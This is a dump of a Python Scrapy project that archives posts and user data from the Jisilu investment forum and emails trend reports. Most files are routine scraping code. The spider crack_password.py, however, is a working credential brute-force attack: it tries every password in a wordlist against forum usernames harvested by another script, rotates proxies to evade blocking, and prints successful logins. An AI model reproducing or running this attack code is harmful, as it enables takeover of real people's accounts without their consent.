├── jsl
├── __init__.py
├── spiders
│ ├── __init__.py
│ ├── aes_encode.py
│ ├── crack_password.py
│ ├── relationship.py
│ ├── questions_loop.py
│ ├── jisilu_user_content.py
│ ├── weekly_content.py
│ ├── allcontent.py
│ └── questions.py
├── items.py
├── middlewares.py
├── settings.py
└── pipelines.py
├── daily_trend.bat
├── jsl_daily_content.bat
├── jsl_comphrehensive_content.bat
├── .gitattributes
├── .gitignore
├── single_user.py
├── question.py
├── comprehensive_content.py
├── scrapy.cfg
├── daily_content.py
├── weekly_content.py
├── README.md
├── run.py
├── daily_send.py
├── mongo_syncup.py
├── guess_first_day_price.py
├── collect_username.py
├── trend.py
├── guess_first_day_price_syncup.py
├── crack_jsl.py
└── 数据迁移.ipynb
/jsl/__init__.py:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/daily_trend.bat:
--------------------------------------------------------------------------------
1 | cd C:\Users\Administrator\Documents\code\jsl
2 | python daily_send.py
--------------------------------------------------------------------------------
/jsl_daily_content.bat:
--------------------------------------------------------------------------------
1 | cd C:\Users\Administrator\Documents\code\jsl
2 | python daily_content.py
--------------------------------------------------------------------------------
/jsl_comphrehensive_content.bat:
--------------------------------------------------------------------------------
1 | cd C:\Users\Administrator\Documents\code\jsl
2 | python comprehensive_content.py
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | *.js linguist-language=python
2 | *.css linguist-language=python
3 | *.ipynb linguist-language=python
4 | *.html linguist-language=python
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | .idea
3 | config.py
4 | *.log
5 | settings.py
6 | data.cfg
7 | config_path/config.json
8 | config_.py
9 | creator.txt
10 | userinfo.py
11 | .ipynb_checkpoints/
--------------------------------------------------------------------------------
/single_user.py:
--------------------------------------------------------------------------------
1 | from scrapy import cmdline
2 | import datetime
3 | # 获取指定日期内的所有帖子
4 |
5 | # cmd = 'scrapy crawl allcontent'
6 | cmd = 'scrapy crawl single_user'
7 | cmdline.execute(cmd.split())
--------------------------------------------------------------------------------
/jsl/spiders/__init__.py:
--------------------------------------------------------------------------------
1 | # This package will contain the spiders of your Scrapy project
2 | #
3 | # Please refer to the documentation for information on how to create and manage
4 | # your spiders.
5 |
--------------------------------------------------------------------------------
/question.py:
--------------------------------------------------------------------------------
1 | # -*-coding=utf-8-*-
2 |
3 | # @Time : 2018/12/27 17:04
4 | # @File : question.py
5 |
6 | from scrapy import cmdline
7 |
8 | cmd = 'scrapy crawl questions -s LOG_FILE=log/question.log'
9 | # cmd = 'scrapy crawl questions'
10 | cmdline.execute(cmd.split())
--------------------------------------------------------------------------------
/comprehensive_content.py:
--------------------------------------------------------------------------------
1 | from scrapy import cmdline
2 | import datetime
3 | # 获取指定日期内的所有帖子
4 |
5 | # cmd = 'scrapy crawl allcontent'
6 | cmd = 'scrapy crawl allcontent -s LOG_FILE=log/allcontent-{}.log -a daily=no'.format(datetime.datetime.now().strftime('%Y-%m-%d'))
7 | cmdline.execute(cmd.split())
--------------------------------------------------------------------------------
/scrapy.cfg:
--------------------------------------------------------------------------------
1 | # Automatically created by: scrapy startproject
2 | #
3 | # For more information about the [deploy] section see:
4 | # https://scrapyd.readthedocs.org/en/latest/deploy.html
5 |
6 | [settings]
7 | default = jsl.settings
8 |
9 | [deploy]
10 | #url = http://localhost:6800/
11 | project = jsl
12 |
--------------------------------------------------------------------------------
/daily_content.py:
--------------------------------------------------------------------------------
1 | # -*-coding=utf-8-*-
2 |
3 | # @Time : 2018/12/27 16:58
4 | # @File : daily_content.py
5 | from scrapy import cmdline
6 | import datetime
7 | # 获取指定日期内的所有帖子
8 |
9 | cmd = 'scrapy crawl allcontent -s LOG_FILE=log/allcontent-{}.log -a daily=yes'.format(datetime.datetime.now().strftime('%Y-%m-%d'))
10 | cmdline.execute(cmd.split())
11 |
--------------------------------------------------------------------------------
/weekly_content.py:
--------------------------------------------------------------------------------
1 | # -*-coding=utf-8-*-
2 |
3 | # @Time : 2018/12/27 16:58
4 | # @File : daily_content.py
5 | from scrapy import cmdline
6 | import datetime
7 | # 获取指定日期内的所有帖子
8 |
9 | # cmd = 'scrapy crawl allcontent -s LOG_FILE=log/allcontent-{}.log -a daily=yes'.format(datetime.datetime.now().strftime('%Y-%m-%d'))
10 | cmd = 'scrapy crawl week_content'
11 | cmdline.execute(cmd.split())
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # jsl
2 | 抓取集思录指定的用户的帖子,存档到mongo
3 |
4 | #### 2020-11-27更新 加入登录JS加密与解密
5 | [http://30daydo.com/article/44109](http://30daydo.com/article/44109)
6 |
7 |
8 | 使用方法:
9 | 安装scrapy + pymongo, 安装mongo服务器
10 |
11 | 安装完成后运行 python run.py
12 | 需要抓取指定的用户名:比如 毛之川
13 | 等待程序返回用户的id,然后把id 复制到spider/jisilu.py 文件中的 self.uid = '8132', 替换这个值
14 | 修改pipeline.py文件中这一行
15 | self.user = u'毛之川' # 修改为指定的用户名 如 毛之川
16 |
17 | #### 新增爬取全站数据
18 |
19 | #### guess_first_day_price_syncup.py 估算可转债上市价格
20 |
21 | ### 关注公众号: 可转债量化分析
22 | 
--------------------------------------------------------------------------------
/jsl/spiders/aes_encode.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # @Time : 2020/11/27 22:00
3 | # @File : aes_encode.py
4 | # @Author : Rocky C@www.30daydo.com
5 |
6 | import execjs
7 | import os
8 | key = '397151C04723421F'
9 | filename = 'encode_jsl.js'
10 | path = os.path.dirname(os.path.abspath(__file__))
11 | full_path = os.path.join(path,filename)
12 |
13 | def decoder(text):
14 | with open(full_path, 'r', encoding='utf8') as f:
15 | source = f.read()
16 |
17 | ctx = execjs.compile(source)
18 | return ctx.call('jslencode', text, key)
19 |
20 |
21 | if __name__ == '__main__':
22 | print(decoder('123456'))
--------------------------------------------------------------------------------
/run.py:
--------------------------------------------------------------------------------
1 | # -*-coding=utf-8-*-
2 |
3 | __author__ = 'Rocky'
4 | '''
5 | http://30daydo.com
6 | Email: weigesysu@qq.com
7 | '''
8 | from scrapy import cmdline
9 | import requests
10 | import re
11 |
12 | def search_id():
13 | name = input(u'请输入你需要抓取的用户名: ')
14 | url = 'https://www.jisilu.cn/people/{}'.format(str(name))
15 | # url ='https://www.jisilu.cn/people/持有封基'
16 | r = requests.get(url)
17 | user_id = re.findall('var PEOPLE_USER_ID = \'(\d+)\';' , r.text)
18 | print(user_id[0])
19 |
20 | def main():
21 | # search_id()
22 | # exit()
23 |
24 | cmd = 'scrapy crawl allcontent'
25 |
26 |
27 |
28 | if __name__ == '__main__':
29 | main()
--------------------------------------------------------------------------------
/jsl/items.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Define here the models for your scraped items
4 | #
5 | # See documentation in:
6 | # http://doc.scrapy.org/en/latest/topics/items.html
7 |
8 | import scrapy
9 |
10 |
11 | class JslItem(scrapy.Item):
12 | # define the fields for your item here like:
13 | # name = scrapy.Field()
14 | title = scrapy.Field()
15 | creator = scrapy.Field()
16 | content = scrapy.Field()
17 | content_html = scrapy.Field()
18 | url = scrapy.Field()
19 | html = scrapy.Field()
20 | question_id = scrapy.Field()
21 | createTime = scrapy.Field()
22 | resp_no = scrapy.Field()
23 | resp = scrapy.Field() # list
24 | crawlTime = scrapy.Field()
25 | # type_ = scrapy.Field()
26 | last_resp_date = scrapy.Field()
27 | only_add = scrapy.Field()
28 |
29 | class Relationship(scrapy.Item):
30 | user_id = scrapy.Field()
31 | flag = scrapy.Field()
32 | user = scrapy.Field()
33 | prestige = scrapy.Field() # 威望
34 | approve = scrapy.Field() # 赞同
35 | follows_count = scrapy.Field()
36 | fans_count = scrapy.Field()
37 | follows_list = scrapy.Field()
38 | fans_list = scrapy.Field()
39 | crawltime = scrapy.Field()
40 |
41 |
42 |
--------------------------------------------------------------------------------
/daily_send.py:
--------------------------------------------------------------------------------
1 | # 每天的热帖
2 |
3 | import datetime
4 | import pymongo
5 | from settings import send_from_aliyun,DBSelector
6 |
7 | last_time = -10 # 多少周之前
8 |
9 |
10 | db=DBSelector().mongo()
11 | MAX = 1000
12 | current = datetime.datetime.now()
13 |
14 | last_day = current + datetime.timedelta(hours=-32) # 脚本设置在早上8点运行
15 | current_str = current.strftime("%Y-%m-%d")
16 |
17 |
18 | def main():
19 | result = db['db_parker']['jsl'].find({},{'html':0}).sort('_id',pymongo.DESCENDING).limit(MAX)
20 | filter_result = []
21 | for i in result:
22 | createTime = i['createTime']
23 | createTime = datetime.datetime.strptime(createTime,'%Y-%m-%d %H:%M')
24 | if createTime >= last_day :
25 | title = i['title']
26 | creator = i['creator']
27 | resp_count = len(i['resp'])
28 | url = i['url']
29 | d = {'title':title,'url':url,'resp_count':resp_count}
30 | filter_result.append(d)
31 |
32 | hot_list = list(sorted(filter_result,key=lambda x:x['resp_count'],reverse=True))[:10]
33 | title,html = format_mail(hot_list)
34 | try:
35 | send_from_aliyun(title,html,types='html')
36 |
37 | except Exception as e:
38 | # logger.error(e)
39 | print(e)
40 |
41 |
42 | def format_mail(hot_list):
43 | title='{} jsl TOP10'.format(current_str)
44 | content = ''
45 | for hl in hot_list:
46 | content+='
{} 回复:{}
'.format(hl['url'],hl['title'],hl['resp_count'])
47 |
48 | return title,content
49 |
50 |
51 |
52 | if __name__ == '__main__':
53 | main()
--------------------------------------------------------------------------------
/mongo_syncup.py:
--------------------------------------------------------------------------------
1 | # 同步两个mongodb的数据
2 | import pymongo
3 | from settings import DBSelector
4 | from loguru import logger
5 |
6 | logger.add('syncup.log')
7 | db=DBSelector()
8 | client = db.mongo('qq')
9 | remote=client['db_parker']['jsl']
10 | local=pymongo.MongoClient()['db_parker']['jsl']
11 | remote_data = remote.find()
12 |
13 | # 更新本地数据
14 | def update(item,question_id,update=False):
15 | del item['_id']
16 |
17 | if update:
18 | local.update_one({'question_id':question_id},{'$set':{'resp':item['resp'],'resp_no':item['resp_no']}})
19 | else:
20 | local.insert_one(item)
21 | remote.delete_one({'question_id': question_id})
22 |
23 | def remove(item):
24 | remote.delete_one({'_id': item['_id']})
25 |
26 |
27 |
28 | for item in remote_data:
29 | question_id = item['question_id']
30 | local_find_doc = local.find_one({'question_id':question_id})
31 | if local_find_doc:
32 | resp_no = item['resp_no']
33 |
34 | if resp_no<=local_find_doc['resp_no']:
35 | try:
36 | remove(item)
37 | except Exception as e:
38 | logger.error(e)
39 | else:
40 | logger.info(f'删除相同{question_id}')
41 |
42 | else:
43 | try:
44 | update(item,question_id,True)
45 | except Exception as e:
46 | logger.error(e)
47 |
48 | else:
49 | logger.info(f'更新本地{question_id}')
50 | else:
51 | try:
52 | update(item,question_id,False)
53 | except Exception as e:
54 | logger.error(e)
55 | else:
56 | logger.info(f'删除不存在,备份后的{question_id}')
57 |
--------------------------------------------------------------------------------
/guess_first_day_price.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # website: http://30daydo.com
3 | # @Time : 2019/7/10 22:46
4 | # @File : guess_first_day_price.py
5 |
6 | # 猜测第一天上市价格
7 | # 使用twsisted失败
8 |
9 | from twisted.web.client import getPage
10 | from twisted.internet import reactor
11 | from twisted.internet import defer
12 | from scrapy.selector import Selector
13 | import numpy as np
14 |
15 | result_list = []
16 |
17 | def get_response_callback(content):
18 | # print(content)
19 |
20 | text = str(content,encoding='utf-8')
21 | # print(text)
22 | response = Selector(text=text)
23 | nodes = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div')
24 | for node in nodes:
25 | reply = node.xpath('.//div[@class="markitup-box"]/text()').extract_first()
26 | if reply:
27 | reply = reply.strip()
28 | # print(reply)
29 | result_list.append(float(reply))
30 |
31 | print('done')
32 |
33 |
34 | @defer.inlineCallbacks
35 | def task(url):
36 | d= getPage(url.encode('utf-8'))
37 | d.addCallback(get_response_callback)
38 | yield d
39 |
40 | def get_result():
41 | # print(result_list)
42 | # print(result_list)
43 | result = np.array(result_list)
44 | print(result.mean())
45 |
46 | urls='https://www.jisilu.cn/question/id-321075__sort_key-__sort-DESC__uid-__page-{}'
47 | d_list=[]
48 | page = 4
49 | for i in range(1,page+1):
50 | # print(urls.format(i))
51 | t = task(urls.format(i))
52 | # t = task(urls)
53 | d_list.append(t)
54 | d = defer.DeferredList(d_list)
55 | # d.addBoth(lambda _:reactor.callLater(0,get_result()))
56 | d.addBoth(lambda _:reactor.stop())
57 | reactor.run()
58 |
59 |
--------------------------------------------------------------------------------
/collect_username.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # website: http://30daydo.com
3 | # @Time : 2020/9/5 14:25
4 | # @File : collect_username.py
5 | import pymongo
6 | import codecs
7 | from loguru import logger
8 | from jsl import config
9 |
10 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}'
11 | client = pymongo.MongoClient(connect_uri)
12 |
13 | doc = client['db_parker'][config.doc_name]
14 |
15 | def collect_creator():
16 | creators = doc.find({},{'creator':1})
17 | user_set = set()
18 | count = 0
19 | for create in creators.batch_size(100):
20 | print(count)
21 | count+=1
22 | name = create.get('creator')
23 | # print(name)
24 | if name is not None and isinstance(name,str):
25 | user_set.add(name)
26 | user_list = list(user_set)
27 | user_str = '\n'.join(user_list)
28 | with codecs.open('creator.txt','w',encoding='utf8') as f:
29 | f.write(user_str)
30 |
31 |
32 | def get_user(filename):
33 | user_list = None
34 | with codecs.open(filename,'r',encoding='utf8') as f:
35 | user_list = f.readlines()
36 | user_list=set(map(lambda x:x.strip(),user_list))
37 | return user_list
38 |
39 | def repler():
40 | resps = doc.find({},{'resp':1,'_id':0})
41 | user_set = set()
42 | count = 0
43 | creartor_set = get_user('creator.txt')
44 |
45 | for resp in resps.batch_size(500):
46 | resp_list = resp.get('resp')
47 | if resp_list:
48 | for resp_ in resp_list:
49 | name=list(resp_.keys())[0]
50 | if name not in creartor_set and name not in user_set:
51 | count += 1
52 | print(count)
53 | print(name)
54 | user_set.add(name)
55 | user_list = list(user_set)
56 | user_str = '\n'.join(user_list)
57 | with codecs.open('reply.txt','w',encoding='utf8') as f:
58 | f.write(user_str)
59 |
60 | repler()
61 | logger.info('Done')
62 |
63 |
64 |
--------------------------------------------------------------------------------
/trend.py:
--------------------------------------------------------------------------------
1 | # -*-coding=utf-8-*-
2 |
3 | # @Time : 2020/1/1 0:08
4 | # @File : trend.py
5 | # 统计发帖趋势
6 | import datetime
7 | import numpy as np
8 | import pandas as pd
9 | from settings import send_from_aliyun, llogger,DBSelector
10 |
11 | last_time = -10 # 多少周之前
12 |
13 | logger = llogger('log/trend_.log')
14 | db = DBSelector().mongo()
15 | doc = db['db_parker']['jsl']
16 | total_list = []
17 | date = datetime.datetime.now() + datetime.timedelta(days=-365) # 一年内的数据
18 |
19 |
20 | def main(send_mail=True):
21 | for item in doc.find({'last_resp_date': {'$gt': date}}, {'html': 0, 'resp': 0, 'content': 0}):
22 | del item['_id']
23 | total_list.append(item)
24 |
25 | df = pd.DataFrame(total_list)
26 | df['createTime'] = pd.to_datetime(df['createTime'])
27 | df = df.set_index('createTime', drop=True)
28 | new_df = df.resample('W').count()
29 | show_data = new_df[['creator']].iloc[:last_time:-1]
30 | # print(show_data)
31 | # 最大值与
32 | max_index = new_df['creator'].idxmax().to_pydatetime().strftime('%Y-%m-%d')
33 | max_v = new_df['creator'].max()
34 | current = datetime.datetime.now().strftime('%Y-%m-%d')
35 | title = f'jsl一周发帖数量分析 {current}'
36 | percentage = np.round(
37 | (show_data['creator'].values[:-1] - show_data['creator'].values[1:]) / show_data['creator'].values[1:] * 100, 0)
38 | content = '| 日期 | 贴数 | 环比 |\n'
39 | # print(percentage)
40 | percentage = np.append(percentage, np.nan)
41 | start_index = 0
42 | for index, item in show_data.iterrows():
43 | # print(index,item['creator'])
44 | py_date = index.to_pydatetime().strftime('%Y-%m-%d')
45 | count = item['creator']
46 | content += f'| {py_date} | {count} | {percentage[start_index]}% |\n'
47 | start_index += 1
48 | content += f'最大值发生在 {max_index},贴数为 {max_v}\n'
49 | logger.info(title)
50 | logger.info(content)
51 | if send_mail:
52 | try:
53 | send_from_aliyun(title, content)
54 | except Exception as e:
55 | logger.error(e)
56 |
57 |
58 | def process_data():
59 | '''
60 | 清除一些无用字段的
61 | :return:
62 | '''
63 | # for item in doc.find({'createTime': {"$regex": "^发"}}, {'_id': 1,'createTime':1}):
64 | for item in doc.find({'crawlTime': None}, {'_id': 1}):
65 | # print(item)
66 | doc.delete_one({'_id': item['_id']})
67 | print(item)
68 |
69 | if __name__ == '__main__':
70 | main(send_mail=True)
71 | # process_data()
72 |
--------------------------------------------------------------------------------
/jsl/middlewares.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Define here the models for your spider middleware
4 | #
5 | # See documentation in:
6 | # http://doc.scrapy.org/en/latest/topics/spider-middleware.html
7 | import time
8 |
9 | import requests
10 | from scrapy import signals
11 | from jsl.config import proxy_ip
12 |
13 | class JslSpiderMiddleware(object):
14 | # Not all methods need to be defined. If a method is not defined,
15 | # scrapy acts as if the spider middleware does not modify the
16 | # passed objects.
17 |
18 | @classmethod
19 | def from_crawler(cls, crawler):
20 | # This method is used by Scrapy to create your spiders.
21 | s = cls()
22 | crawler.signals.connect(s.spider_opened, signal=signals.spider_opened)
23 | return s
24 |
25 | def process_spider_input(self, response, spider):
26 | # Called for each response that goes through the spider
27 | # middleware and into the spider.
28 |
29 | # Should return None or raise an exception.
30 | return None
31 |
32 | def process_spider_output(self, response, result, spider):
33 | # Called with the results returned from the Spider, after
34 | # it has processed the response.
35 |
36 | # Must return an iterable of Request, dict or Item objects.
37 | for i in result:
38 | yield i
39 |
40 | def process_spider_exception(self, response, exception, spider):
41 | # Called when a spider or process_spider_input() method
42 | # (from other spider middleware) raises an exception.
43 |
44 | # Should return either None or an iterable of Response, dict
45 | # or Item objects.
46 | pass
47 |
48 | def process_start_requests(self, start_requests, spider):
49 | # Called with the start requests of the spider, and works
50 | # similarly to the process_spider_output() method, except
51 | # that it doesn’t have a response associated.
52 |
53 | # Must return only requests (not items).
54 | for r in start_requests:
55 | yield r
56 |
57 | def spider_opened(self, spider):
58 | spider.logger.info('Spider opened: %s' % spider.name)
59 |
60 | class MyCustomDownloaderMiddleware(object):
61 | def __init__(self):
62 | self.proxyurl = 'http://{}:8101/dynamicIp/common/getDynamicIp.do'.format(proxy_ip)
63 |
64 | def process_request(self, request, spider):
65 | proxyServer = self.get_proxy()
66 | print('使用了代理')
67 | print(proxyServer)
68 | request.meta["proxy"] = proxyServer
69 |
70 | def get_proxy(self, retry=50):
71 | for i in range(retry):
72 | try:
73 | r = requests.get(self.proxyurl, timeout=10)
74 | except Exception as e:
75 | print(e)
76 | print('Failed to get proxy ip, retry ' + str(i))
77 | time.sleep(1)
78 | else:
79 | js = r.json()
80 | proxyServer = 'https://{0}:{1}'.format(js.get('ip'), js.get('port'))
81 | return proxyServer
82 |
83 | return None
84 |
--------------------------------------------------------------------------------
/jsl/spiders/crack_password.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # website: http://30daydo.com
3 | # @Time : 2020/9/5 14:03
4 | # @File : crack_password.py
5 |
6 | # 登录破解
7 | import json
8 |
9 | import pymongo
10 | from scrapy import Spider
11 | import codecs
12 | from scrapy import FormRequest, Request
13 | from jsl import config
14 |
15 | class CrackSpider(Spider):
16 | name = 'crack'
17 | custom_settings = {'COOKIES_ENABLED': False,
18 | 'DOWNLOADER_MIDDLEWARES': {'jsl.middlewares.MyCustomDownloaderMiddleware': 543},
19 | 'ITEM_PIPELINES': {'jsl.pipelines.JslPipeline': None},
20 | 'CONCURRENT_REQUESTS':1
21 | }
22 |
23 | def __init__(self, *args,**kwargs):
24 | super(CrackSpider, self).__init__(*args,**kwargs)
25 | self.doc = pymongo.MongoClient(host=config.mongodb_host,port=config.mongodb_port)
26 |
27 | filename = 'creator.txt'
28 | with codecs.open(filename, 'r', encoding='utf8') as f:
29 | conent = f.readlines()
30 | self.content = list(map(lambda x: x.strip(), conent))
31 |
32 | self.url = 'https://www.jisilu.cn/account/ajax/login_process/'
33 | self.data = {
34 | 'return_url': 'https://www.jisilu.cn/',
35 | 'user_name': '',
36 | 'password': '',
37 | 'net_auto_login': '1',
38 | '_post_type': 'ajax',
39 | }
40 | self.headers = {
41 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache',
42 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01',
43 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest',
44 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36',
45 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
46 | 'Referer': 'https://www.jisilu.cn/login/',
47 | 'Accept-Encoding': 'gzip,deflate,br',
48 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8'
49 | }
50 | with open('password.txt', 'r') as f:
51 | password_list = f.readlines()
52 | self.password_list = list(map(lambda x: x.strip(), password_list))
53 |
54 | def start_requests(self):
55 |
56 | yield Request(
57 | url='https://www.jisilu.cn',
58 | headers=self.headers,
59 | callback=self.parse_user,
60 | cookies=None,
61 | )
62 |
63 | def parse_user(self, response):
64 | user = self.content.pop()
65 | while user:
66 | for password in self.password_list:
67 | data = self.data.copy()
68 | data['user_name'] = user
69 | data['password'] = password
70 | yield FormRequest(
71 | url=self.url,
72 | headers=self.headers,
73 | formdata=data,
74 | callback=self.parse_data,
75 | dont_filter=True,
76 | cookies=None,
77 | meta={'username':user,'password':password}
78 | )
79 |
80 | def parse_data(self, response):
81 | print(response.text)
82 | js_data = json.loads(response.text)
83 | errno = js_data.get('errno')
84 | if errno==0:
85 | print('*********')
86 | print('user==>',response.meta['username'])
87 | print('password==>',response.meta['password'])
--------------------------------------------------------------------------------
/guess_first_day_price_syncup.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # website: http://30daydo.com
3 | # @Time : 2019/10/20 19:41
4 | # @File : guess_first_day_price_syncup.py
5 |
6 | # 同步获取
7 | import sys
8 | import time
9 | from selenium import webdriver
10 | from scrapy.selector import Selector
11 | from jsl import config
12 | import pymongo
13 |
14 |
15 |
16 | headers = {'User-Agent': 'FireFox Molliza Chrome'}
17 | path = r'D:\OneDrive\Python\selenium\chromedriver.exe'
18 | option = webdriver.ChromeOptions()
19 | option.add_argument(
20 | '--user-agent=Mozilla/5.0 (Windows NT 9.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36')
21 | option.add_argument('--headless')
22 | driver = webdriver.Chrome(executable_path=path, chrome_options=option)
23 | driver.implicitly_wait(10)
24 |
25 |
26 | def login():
27 | url = 'https://www.jisilu.cn/login/'
28 | driver.get(url)
29 | input_name = driver.find_element_by_xpath('//input[@id="aw-login-user-name"]')
30 | input_name.send_keys(config.jsl_user)
31 | password = driver.find_element_by_xpath('//input[@id="aw-login-user-password"]')
32 | password.send_keys(config.jsl_password)
33 | time.sleep(0.5)
34 | submit = driver.find_element_by_xpath('//a[@id="login_submit"]')
35 | submit.click()
36 | time.sleep(5)
37 |
38 |
39 | def predict(url,name):
40 |
41 | driver.get(url)
42 | current_page = 1
43 | sum = 0
44 | price_list = []
45 | while 1:
46 |
47 | try:
48 |
49 | price = parse(driver.page_source)
50 | if price:
51 | price_list.extend(price)
52 |
53 | next_btn = driver.find_element_by_xpath('//div[@class="pagination pull-right"]//a[contains(text(),">")]')
54 |
55 | except Exception as e:
56 | print(e)
57 | break
58 | else:
59 |
60 | current_page += 1
61 | next_btn.click()
62 | # 改为去掉最大和最小的值
63 | max_v=max(price_list)
64 | min_v=min(price_list)
65 | # print(price_list)
66 | price_list.remove(max_v)
67 | price_list.remove(min_v)
68 | # print(price_list)
69 | # price_np = np.array(price_list)
70 | for i in price_list:
71 | sum+=i
72 |
73 | avg = round( sum/len(price_list),3)
74 | print(f'avg price {avg}')
75 | client = pymongo.MongoClient(config.mongodb_host, config.mongodb_port)
76 | doc = client['db_stock']['kzz_price_predict']
77 | doc.insert_one({'name':name,'predict_price':avg})
78 | driver.close()
79 |
80 |
81 | def parse(text):
82 | response = Selector(text=text)
83 | nodes = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')
84 | result_list = []
85 | for node in nodes:
86 | comment = node.xpath(
87 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first()
88 | if comment:
89 | comment = comment.strip()
90 | try:
91 | comment = float(comment)
92 |
93 | except Exception as e:
94 | continue
95 | else:
96 | result_list.append(comment)
97 | else:
98 | continue
99 | return result_list
100 |
101 |
102 | def main(url,name):
103 | login()
104 | predict(url,name)
105 |
106 | if __name__ == '__main__':
107 | if len(sys.argv)!=3:
108 | print('python guess_first_price_syncup url name\n')
109 | else:
110 | url=sys.argv[1]
111 | name =sys.argv[2]
112 | main(url,name)
113 |
--------------------------------------------------------------------------------
/jsl/settings.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Scrapy settings for jsl project
4 | #
5 | # For simplicity, this file contains only settings considered important or
6 | # commonly used. You can find more settings consulting the documentation:
7 | #
8 | # http://doc.scrapy.org/en/latest/topics/settings.html
9 | # http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
10 | # http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
11 |
12 | BOT_NAME = 'jsl'
13 |
14 | SPIDER_MODULES = ['jsl.spiders']
15 | NEWSPIDER_MODULE = 'jsl.spiders'
16 |
17 |
18 | # Crawl responsibly by identifying yourself (and your website) on the user-agent
19 | #USER_AGENT = 'jsl (+http://www.yourdomain.com)'
20 |
21 | # Obey robots.txt rules
22 | ROBOTSTXT_OBEY = False
23 |
24 | # Configure maximum concurrent requests performed by Scrapy (default: 16)
25 |
26 | #CONCURRENT_REQUESTS = 32
27 | # LOG_LEVEL='INFO'
28 | CONCURRENT_REQUESTS = 2
29 | LOG_LEVEL='INFO'
30 | DOWNLOAD_DELAY = 1
31 | # REDIRECT_ENABLED = False
32 | # Configure a delay for requests for the same website (default: 0)
33 | # See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
34 | # See also autothrottle settings and docs
35 | # DOWNLOAD_DELAY = 1
36 | # The download delay setting will honor only one of:
37 | #CONCURRENT_REQUESTS_PER_DOMAIN = 16
38 | #CONCURRENT_REQUESTS_PER_IP = 16
39 |
40 | # Disable cookies (enabled by default)
41 | COOKIES_ENABLED = True
42 |
43 | # Disable Telnet Console (enabled by default)
44 | #TELNETCONSOLE_ENABLED = False
45 |
46 | # Override the default request headers:
47 | #DEFAULT_REQUEST_HEADERS = {
48 | # 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
49 | # 'Accept-Language': 'en',
50 | #}
51 |
52 | # Enable or disable spider middlewares
53 | # See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
54 | #SPIDER_MIDDLEWARES = {
55 | # 'jsl.middlewares.JslSpiderMiddleware': 543,
56 | #}
57 |
58 | # Enable or disable downloader middlewares
59 | # See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
60 | # DOWNLOADER_MIDDLEWARES = {
61 | # 'jsl.middlewares.MyCustomDownloaderMiddleware': 543,
62 | # }
63 |
64 | # Enable or disable extensions
65 | # See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
66 | #EXTENSIONS = {
67 | # 'scrapy.extensions.telnet.TelnetConsole': None,
68 | #}
69 |
70 | # Configure item pipelines
71 | # See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
72 | ITEM_PIPELINES = {
73 | # 'jsl.pipelines.ElasticPipeline': 300,
74 | 'jsl.pipelines.JslPipeline':300,
75 | # 'scrapyelasticsearch.scrapyelasticsearch.ElasticSearchPipeline':200,
76 | }
77 |
78 | # Enable and configure the AutoThrottle extension (disabled by default)
79 | # See http://doc.scrapy.org/en/latest/topics/autothrottle.html
80 | #AUTOTHROTTLE_ENABLED = True
81 | # The initial download delay
82 | #AUTOTHROTTLE_START_DELAY = 5
83 | # The maximum download delay to be set in case of high latencies
84 | #AUTOTHROTTLE_MAX_DELAY = 60
85 | # The average number of requests Scrapy should be sending in parallel to
86 | # each remote server
87 | #AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
88 | # Enable showing throttling stats for every response received:
89 | #AUTOTHROTTLE_DEBUG = False
90 |
91 | # Enable and configure HTTP caching (disabled by default)
92 | # See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
93 | #HTTPCACHE_ENABLED = True
94 | #HTTPCACHE_EXPIRATION_SECS = 0
95 | #HTTPCACHE_DIR = 'httpcache'
96 | #HTTPCACHE_IGNORE_HTTP_CODES = []
97 | #HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
98 |
99 | ELASTICSEARCH_SERVERS = ['10.18.6.102:9200']
100 | ELASTICSEARCH_INDEX='jsl_elastic'
101 | ELASTICSEARCH_TYPE='ticket'
102 |
--------------------------------------------------------------------------------
/jsl/pipelines.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 |
3 | # Define your item pipelines here
4 | #
5 | # Don't forget to add your pipeline to the ITEM_PIPELINES setting
6 | # See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
7 | import datetime
8 | import logging
9 |
